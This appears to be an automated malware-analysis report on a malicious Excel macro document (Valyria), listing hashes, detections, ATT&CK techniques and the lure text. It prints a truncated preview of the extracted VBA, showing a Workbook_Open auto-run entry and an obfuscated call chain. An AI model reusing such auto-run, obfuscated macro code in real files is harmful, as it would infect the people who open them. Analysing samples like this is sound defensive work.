Valyria — Office (OLE) malware analysis

Static analysis result for SHA-256 43282cb81e28bd2b…

MALICIOUS

Office (OLE)

Size: 459.5 KB
Created: 2017-07-31 21:33:49
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: d5fcb67076441a54ea2891ae2eaf1e04
SHA-1: 5190704e5fa4ded23c336403853b59e1100cd84e
SHA-256: 43282cb81e28bd2b7d4086f9ba4a3c538c3d875871bdcf881e58c6b0da017824
Risk Score: 188

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter

The sample is identified as malicious by ClamAV with the signature Xls.Malware.Valyria-10036514-0. It contains VBA macros, specifically a Workbook_Open macro, which runs automatically when the workbook is opened and is a common technique for executing malicious code as soon as the document is viewed. The presence of a Shell() call in the VBA code indicates that the macro is likely attempting to execute external commands or to download and run a secondary payload. The document body displays a deceptive message in Turkish, 'Microsoft Excel Macro error, enable macro for viewing!', which serves as the lure to make the user enable macros.

Heuristics 5

  • ClamAV: Xls.Malware.Valyria-10036514-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
    Workbook_Open macro
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 111646 bytes
SHA-256: a93bc49a7181ef9fe334fca23c0325c00c20a05c56b86e7a3f89e04b2aa3d448
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Revive"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Revive1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub
Static Function BxXRyBtUEullqxI() As Long
Call YWLZgeFDdMFbImw
End Function
Function YWLZgeFDdMFbImw() As Double
Call YbLqaeqCChBbWFv
End Function
Private Function YbLqaeqCChBbWFv() As Currency
Call xsiMYFgWvzgqxbT
End Function
Static Function xsiMYFgWvzgqxbT() As Long
Call MLaGLqStUSrTNsK
End Function
Static Sub MLaGLqStUSrTNsK()
Call lUhqXRnzimiHxuS
End Sub
Function lUhqXRnzimiHxuS() As Boolean
Call CeJxYADIbGFIWst
End Function
Private Sub CeJxYADIbGFIWst()
Call WRsQuUeetVAMayH
End Sub
Static Sub WRsQuUeetVAMayH()
Call oUDlKDYYHqimJcS
End Sub
Static Sub oUDlKDYYHqimJcS()
Call eimMeNZoqKzbEJB
End Sub
Private Sub eimMeNZoqKzbEJB()
Call LyqKnfVGEdxdpkF
End Sub
Private Function LyqKnfVGEdxdpkF() As Double
Call CFJyWoAHJxartyY
End Function
Private Function CFJyWoAHJxartyY() As String
Call lNwKtGaLsSjSmGM
End Function
Sub lNwKtGaLsSjSmGM()
Call rgIcVzHkwkcHtRX
End Sub
Private Sub rgIcVzHkwkcHtRX()
Call pCoRlCiMeCBKpXD
End Sub
Private Function pCoRlCiMeCBKpXD() As Variant
Call xNjxbutXDWFYFOz
End Function
Static Sub xNjxbutXDWFYFOz()
Call wbzAHvzkHpqAKBO
End Sub
Function wbzAHvzkHpqAKBO() As Date
Call FeesMmohBKFniZt
End Function
Private Function FeesMmohBKFniZt() As Object
Call TFmZjYwSEcGrqJB
End Function
Private Function TFmZjYwSEcGrqJB() As Date
Call dBBfDOPATygDXOQ
End Function
Private Function dBBfDOPATygDXOQ() As Byte
Call tTtZqyBXsRrfofI
End Function
Sub tTtZqyBXsRrfofI()
Call SdAJCZWdGliUXhP
End Sub
Private Function SdAJCZWdGliUXhP() As Integer
Call jnbQEImmAFFVxer
End Function
Private Sub jnbQEImmAFFVxer()
Call XJbdJTIQOWLljfq
End Sub
Sub XJbdJTIQOWLljfq()
Call wZGZEtiAOQgfSoR
End Sub
Sub wZGZEtiAOQgfSoR()
Call mopzYDjPxjxTNVB
End Sub
Static Function mopzYDjPxjxTNVB() As Boolean
Call TDtyhWfhLCwVyxE
End Function
Static Sub TDtyhWfhLCwVyxE()
Call YfVCtQhVuTdmvbg
End Sub
Static Function YfVCtQhVuTdmvbg() As Double
Call HnIORiHZdnnNpjU
End Function
Function HnIORiHZdnnNpjU() As Integer
Call zmLQPqRMCJaACdX
End Function
Static Function zmLQPqRMCJaACdX() As Single
Call xHrFfssnlbACyjC
End Function
Static Function xHrFfssnlbACyjC() As Long
Call FTmlVkDyKvDROby
End Function
Sub FTmlVkDyKvDROby()
Call DgCoAlJMOOosTNN
End Sub
Private Function DgCoAlJMOOosTNN() As Object
Call aFqwjOWumgIilCB
End Function
Static Function aFqwjOWumgIilCB()
Call bKpNdOGtLBEjzVB
End Function
Private Function bKpNdOGtLBEjzVB() As Object
Call zbNjbqwOEUjyarY
End Function
Static Sub zbNjbqwOEUjyarY()
Call AYwNkpLzyqqYxrH
End Sub
Private Sub AYwNkpLzyqqYxrH()
Call oDMNaBDrrGlPaLX
End Sub
Static Sub oDMNaBDrrGlPaLX()
Call lahtmJcecHvKzRE
End Sub
Function lahtmJcecHvKzRE() As Currency
Call MbYqOjbWMcwXrAv
End Function
Private Function MbYqOjbWMcwXrAv() As Object
Call szsbIDtCFujATvP
End Function
Private Sub szsbIDtCFujATvP()
Call iOcCcNuSoNApOcy
End Sub
Static Sub iOcCcNuSoNApOcy()
Call PdfAlgqkCgzrzDC
End Sub
Function PdfAlgqkCgzrzDC() As String
Call GkzoToVmGBbEDRV
End Function
Function GkzoToVmGBbEDRV()
Call osmArGvppVlfxZJ
End Function
Private Sub osmArGvppVlfxZJ()
Call vMySSzbPtndVEkU
End Sub
Static Sub vMySSzbPtndVEkU()
Call fMVrFQgExJyVGZs
End Sub
Function fMVrFQgExJyVGZs()
Call AtZnZuOBBZGmPhv
End Function
Private Sub AtZnZuOBBZGmPhv()
Call zGpqEvUOFtrOVUL
End Sub
Static Function zGpqEvUOFtrOVUL() As Byte
Call IKUiJmJLyOGBtsq
End Function
... (truncated)